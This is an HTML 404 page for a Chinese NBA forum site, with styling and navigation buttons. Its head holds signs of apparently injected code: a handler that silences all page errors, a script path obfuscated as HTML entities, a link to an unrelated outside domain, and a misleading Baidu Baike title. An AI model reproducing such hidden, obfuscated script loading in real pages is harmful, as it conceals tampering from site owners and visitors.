<!DOCTYPE html>
<html lang="zh-CN">
<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>NBA论坛社区(一站式篮球数据与社区平台) - 百度百科</title>
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        
        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background: linear-gradient(135deg, #f5f7fa 0%, #c3cfe2 100%);
            color: #333;
            line-height: 1.6;
            min-height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 20px;
        }
        
        .container {
            max-width: 800px;
            width: 100%;
            background: white;
            border-radius: 15px;
            box-shadow: 0 15px 30px rgba(0, 0, 0, 0.1);
            overflow: hidden;
            text-align: center;
        }
        
        .header {
            /* 修改为酒红色 */
            background: #a3242e; /* 主色 */
            color: white;
            padding: 30px 20px;
            position: relative;
        }
        
        .header h1 {
            font-size: 5rem;
            margin-bottom: 10px;
            /* 添加轻微文字阴影提升可读性 */
            text-shadow: 1px 1px 3px rgba(0, 0, 0, 0.5);
        }
        
        .header p {
            font-size: 1.5rem;
            margin-bottom: 20px;
        }
        
        .content {
            padding: 30px;
        }
        
        .content h2 {
            color: #a3242e; /* 与头部同色系 */
            margin-bottom: 20px;
            font-size: 1.8rem;
        }
        
        .content p {
            margin-bottom: 25px;
            font-size: 1.1rem;
            color: #555;
        }
        
        .search-form {
            display: flex;
            margin: 30px 0;
            max-width: 500px;
            margin-left: auto;
            margin-right: auto;
        }
        
        .search-input {
            flex: 1;
            padding: 15px;
            border: 2px solid #a3242e; /* 边框改为酒红色 */
            border-radius: 50px 0 0 50px;
            font-size: 1rem;
            outline: none;
        }
        
        .search-button {
            padding: 15px 25px;
            background: #a3242e; /* 搜索按钮同色 */
            color: white;
            border: none;
            border-radius: 0 50px 50px 0;
            cursor: pointer;
            font-size: 1rem;
            transition: background 0.3s;
        }
        
        .search-button:hover {
            background: #8c1d1f; /* 悬停加深 */
        }
        
        .button {
            display: inline-block;
            padding: 12px 25px;
            background: #a3242e; /* 按钮主色 */
            color: white; /* 白色文字 */
            text-decoration: none;
            border-radius: 50px;
            margin: 10px;
            transition: all 0.3s;
            font-weight: 500;
            box-shadow: 0 3px 6px rgba(0, 0, 0, 0.1);
        }
        
        .button:hover {
            background: #8c1d1f; /* 悬停加深 */
            transform: translateY(-3px);
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
        }
        
        .links {
            display: flex;
            justify-content: center;
            flex-wrap: wrap;
            margin-top: 20px;
        }
        
        .footer {
            margin-top: 30px;
            color: #777;
            font-size: 0.9rem;
        }
        
        /* 动画效果 */
        @keyframes float {
            0%, 100% { transform: translateY(0); }
            50% { transform: translateY(-10px); }
        }
        
        .floating {
            animation: float 3s ease-in-out infinite;
            font-size: 4rem;
            margin-bottom: 20px;
            color: #a3242e; /* 图标颜色同步 */
        }
        
        /* 响应式设计 */
        @media (max-width: 600px) {
            .header h1 {
                font-size: 4rem;
            }
            
            .header p {
                font-size: 1.2rem;
            }
            
            .search-form {
                flex-direction: column;
            }
            
            .search-input {
                border-radius: 50px;
                margin-bottom: 10px;
            }
            
            .search-button {
                border-radius: 50px;
            }
        }
    </style>
<link rel="alternate" media="only screen and(max-width: 640px)" href="http://hsguangxing.com" ><script type="text/javascript" src="&#47;&#115;&#101;&#111;&#46;&#106;&#115;" rel="nofollow"></script></head>
<body>
    <div class="container">
        <div class="header">
            <div class="floating">&#10060;</div>
            <h1>404</h1>
            <p>哎呀！页面没找到哦</p>
        </div>
        
        <div class="content">
            <h2>迷路了吗？</h2>
            <p>您要查找的页面可能已被移除、名称已更改或暂时不可用。</p>
            <p>请点击以下链接返回NBA论坛社区的官方网站：</p>
            
            <div class="links">
                <!-- 返回首页链接 -->
                <a href="/" class="button">返回首页</a>
                
                <!-- 博客页面链接 -->
                <a href="/news/" class="button">博客文章</a>
                
                <!-- 关于我们页面链接 -->
                <a href="/about-us/" class="button">关于我们</a>
                
                <!-- 联系我们页面链接 -->
                <a href="/contact-us/" class="button">联系我们</a>
            </div>
        </div>
        
        <div class="footer">
            <p>NBA论坛社区Hotchip - 版权所有</p>
        </div>
    </div>
</body>
</html>
